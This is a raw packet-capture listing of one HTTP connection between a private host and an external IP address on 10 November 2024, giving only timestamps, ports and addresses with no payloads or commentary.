Nov 10, 2024 04:55:02.231892109 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.231904984 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.231904984 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.231924057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.231965065 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.231978893 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.231988907 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232001066 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232001066 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232007027 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232018948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232027054 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232033968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232048988 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232049942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232059002 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232060909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232060909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232089043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232094049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232099056 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232101917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232111931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232124090 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232136011 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232137918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232148886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232153893 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232172966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232182026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232182980 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232192039 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232225895 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232229948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232229948 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232245922 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232255936 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232263088 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232270002 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232275009 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232290983 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232299089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232304096 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232309103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232336044 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232389927 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232395887 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232405901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232414961 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232430935 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232444048 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232450008 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232508898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232518911 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232527971 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232539892 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232557058 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232557058 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232573032 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232583046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232608080 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232616901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232645988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232656002 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232680082 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232712984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232743979 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232764006 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232774019 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232784033 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232791901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232795000 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232803106 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232815981 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232827902 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232872963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232883930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232892990 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232902050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.232908964 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232918024 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.232944012 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233088970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233098984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233108997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233115911 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233119011 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233136892 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233155966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233266115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233275890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233284950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233294964 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233299017 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233304024 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.233304977 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233321905 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.233340025 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.234767914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234777927 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234802008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234807968 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.234811068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234821081 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234829903 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.234833956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234852076 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.234867096 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.234914064 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234924078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.234946966 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.234963894 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.290905952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.290918112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.290927887 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.290937901 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.290949106 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.290983915 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.291027069 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315653086 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315696001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315731049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315733910 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315743923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315764904 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315779924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315787077 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315790892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315799952 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315817118 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315824986 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315838099 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315846920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315859079 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315872908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315872908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315888882 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315917969 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315922976 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315932989 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.315953970 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.315963030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.348956108 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.348997116 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349006891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349016905 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349073887 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349083900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349097013 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349098921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349103928 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349111080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349132061 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349154949 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349212885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349221945 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349231958 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349246025 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349266052 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349289894 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349304914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349313974 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349322081 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349323988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349332094 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349335909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349344969 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349344969 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349358082 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349370956 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349419117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349431038 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349440098 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349448919 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349452972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349457979 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349473000 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349479914 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349482059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349492073 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349502087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349505901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349514008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349534035 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349543095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349556923 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349591017 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349601030 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349610090 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349618912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349625111 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349628925 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349632978 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349639893 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349661112 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349670887 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349719048 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349750996 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349781990 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349791050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349800110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349812031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349817038 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349826097 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349843025 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349905968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349915028 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.349939108 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.349955082 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382235050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382265091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382285118 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382298946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382422924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382432938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382442951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382469893 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382494926 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382518053 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382529020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382538080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382545948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382550955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382556915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382565975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382567883 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382575035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382592916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382606030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382643938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382661104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382675886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382678986 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382685900 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382694006 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382697105 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382707119 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382718086 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382740974 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382770061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382780075 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382790089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382797003 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382818937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382848024 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382859945 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382882118 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382896900 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382926941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382937908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382946968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.382958889 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.382975101 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383006096 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383017063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383029938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383035898 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383039951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383057117 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383078098 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383081913 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383090973 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383105993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383115053 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383116007 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383130074 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383140087 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383147955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383168936 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383171082 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383181095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383189917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383202076 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383214951 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383227110 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383322001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383332014 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383337975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383342028 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383359909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383359909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383367062 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383393049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383429050 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383439064 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383462906 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383502960 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383517027 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383526087 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383534908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383559942 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383594990 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383605003 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383614063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383624077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383625031 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383635044 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383641005 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383642912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383666039 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383675098 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383697987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383707047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383718967 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383729935 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383738041 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383749962 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.383754015 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383769035 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.383781910 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384083986 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384093046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384114981 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384119987 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384124994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384130955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384139061 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384145021 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384149075 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384156942 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384159088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384171009 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384187937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384195089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384206057 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384215117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384224892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384227991 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384243011 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384264946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384489059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384529114 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384565115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384573936 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384591103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384602070 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384603977 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384610891 CET	80	49704	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:02.384614944 CET	49704	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:02.384630919 CET	49704	80	192.168.2.5	185.215.113.206
